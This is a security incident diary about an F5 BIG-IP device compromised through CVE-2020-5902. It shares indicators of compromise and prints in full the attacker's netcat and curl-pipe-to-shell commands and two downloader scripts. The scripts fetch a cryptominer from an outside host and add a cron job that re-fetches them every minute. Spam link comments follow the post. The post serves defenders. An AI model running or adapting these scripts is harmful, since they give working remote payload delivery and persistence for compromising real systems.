A few IoCs related to CVE-2020-5902
I know I am a bit late to the game, but a couple of weeks ago I responded to an incident resulting from an F5 compromise related to CVE-2020-5902. As I responded I captured a number if indicators of compromise. While I have not had a lot of time to dig into them, hopefully they will be of use to somebody.
The F5 vulnerability, CVE-2020-5902 was announced, and patches and workarounds made available, by F5 on June 30, 2020. This was a CVSS score 10 which essentially meant that if the management interface of the F5 was exposed to the Internet it was trivial to exploit.
On this particular F5, probes for the presence of the vulnerability began on July 3, 2020 and over the course of the subsequent 4 days the device was probed for vulnerability to CVE-2020-5902 2561 times from 364 unique IPs.
The first detectable exploit was executed against the F5 on July 4, 2020. Exploits continued to be executed against the F5 a number of times over the next few days. It is hard to gauge the effectiveness of these exploits but there is no indication that any of these exploits achieved an effective foothold in the F5.
The first detectable foothold in the F5 was on July 6, 2020. As shown in an earlier diary an alias was used to get access to a shell which was used to execute:
nc 217.12.199.179 9999
which resulted in the execution of:
curl 217.12.199.179/i.sh | sh
As of writing 212.12.199.179 is still up and is still serving up the shell scripts related to this attack.
Here are the contents of i.sh
SHA256 - 34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5
https://www.virustotal.com/gui/file/34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5/detection
#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
LDR="wget -q -O -"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ]; then
WGET="curl -o"
fi
if [ -s /usr/bin/wget ]; then
WGET="wget -O"
fi
DIR="/tmp"
if [ -e "/tmp/bigip" ]; then
if [ -w "/tmp/bigip" ] && [ ! -d "/tmp/bigip" ]; then
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum /tmp/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
rm -rf /tmp/bigip
sleep 1
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]; then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
download() {
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
$WGET $DIR/bigip https://bitbucket.org/sozmon3n3/git/raw/master/bigip
chmod +x $DIR/bigip
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
download3
;;
esac
else
echo "No md5sum"
download3
fi
}
download3() {
$WGET $DIR/bigip http://217.12.199.179/bigip
chmod +x $DIR/bigip
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
echo $sum
case $sum in
fa3cf35e7e83175f395a5b6d35fd456d)
echo "bigip OK"
;;
*)
echo "bigip wrong"
;;
esac
else
echo "No md5sum"
fi
}
download
SKL=b $DIR/bigip
crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
) | crontab -
fi
i.sh adds a recurring cron job which executes a script, b.sh from the same IP.
Here are the contents of b.sh. SHA-256 9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c
https://www.virustotal.com/gui/file/9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c/detection
#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
LDR="wget -q -O -"
fi
crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
) | crontab -
fi
i.sh also downloaded an executable called bigip to /var/tmp which launched a process (daemon) on the F5, /tmp/bigipdaemon.
c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76 bigip
https://www.virustotal.com/gui/file/c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76/detection
517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d bigipdaemon
https://www.virustotal.com/gui/file/517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d/detection
The files are a cryptominer which mines cryptocurrency on behalf of the attacker. The firewall logs clearly show the cryptominer communicating to the IP in the Ukraine where the shell scripts were downloaded from.
Besides the IP associated with the cryptomining the attacker also communicated with 9 other Ips.
Cryptominer IPs
destination_address destination_port Country
217.12.199.179 80 Ukraine
Other associated IPs:
destination_address destination_port Country
193.26.217.129 80 Russia
193.53.127.188 80 Russia
213.226.114.20 80 Russia
213.32.10.148 80 France
45.8.228.49 80 Russia
5.23.52.131 80 Russia
62.109.25.117 80 Russia
95.142.44.164 80 Russia
217.8.117.137 80 Russia
I hope to get some time in the next few weeks to dig into this further, but hopefully this is of some use to someone in the meantime. If anyone has any more related IoCs, please include them in the comments or send them on via the ISC contact page and I will update this diary with the new findings.
-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)
Comments
Anonymous
Dec 3rd 2022
9 months ago
Anonymous
Dec 3rd 2022
9 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
https://defineprogramming.com/
Dec 26th 2022
9 months ago
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
https://defineprogramming.com/
Dec 26th 2022
9 months ago
rthrth
Jan 2nd 2023
8 months ago